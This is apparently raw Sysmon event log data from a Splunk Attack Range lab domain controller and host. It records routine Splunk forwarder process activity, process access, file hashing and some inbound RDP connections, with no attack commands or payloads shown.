23542300x80000000000000001057943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:33.635{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=761D2BE3B9DCE81474FD1A07350C04A8,SHA256=00574EB73417F4EF00C62CE0204B0E4C113EAEEFA10A228EEE6900BADF9AFBEF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:33.339{5EBD8912-8EC1-6151-DE00-00000000FD01}59885984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001057941Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:31.821{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.78-51086-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057940Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:30.973{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54321-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001057939Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:33.181{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8EC1-6151-DE00-00000000FD01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057938Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:33.181{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:33.181{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:33.181{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:33.181{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:33.181{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8EC1-6151-DE00-00000000FD01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:33.181{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8EC1-6151-DE00-00000000FD01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:33.182{5EBD8912-8EC1-6151-DE00-00000000FD01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001057963Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.791{5EBD8912-8EC2-6151-E000-00000000FD01}13124500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057962Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.682{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA77470F0FA19F8AFCF507A6A97C93F6,SHA256=921619C49101F3A18914A7D12D45B070D99D1D2D9DDCE85B555BFA8F60157DCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982281Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:34.945{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BAC5332EDB8FCA7F60204A49B20E790E,SHA256=62E5E2E3A082D2CFCA93AFD89DE6D38ECFAFDC8456C4561BD45FD19A59A1CD39,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982280Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:32.141{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-60411-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000982279Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:31.783{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59596-false10.0.1.12-8000- 23542300x8000000000000000982278Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:34.835{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2178AF63B505B748992ED1F2C2F8898A,SHA256=05FDFBFDC9210E00A3B145D7C3A882590CD4E8AC7674E7B954C32698B5273386,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.603{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8EC2-6151-E000-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.603{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.603{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.603{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.603{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.603{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8EC2-6151-E000-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.603{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8EC2-6151-E000-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.604{5EBD8912-8EC2-6151-E000-00000000FD01}1312C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001057953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.353{5EBD8912-8EC2-6151-DF00-00000000FD01}44481332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.182{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6497A4644A2B706122CD82EE87D6B865,SHA256=4C74E7D03E2D836F09091C39614C017959E0A8D9B71B6B63B0E6F06A906892E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.103{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8EC2-6151-DF00-00000000FD01}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.103{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.103{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.103{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:34.103{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 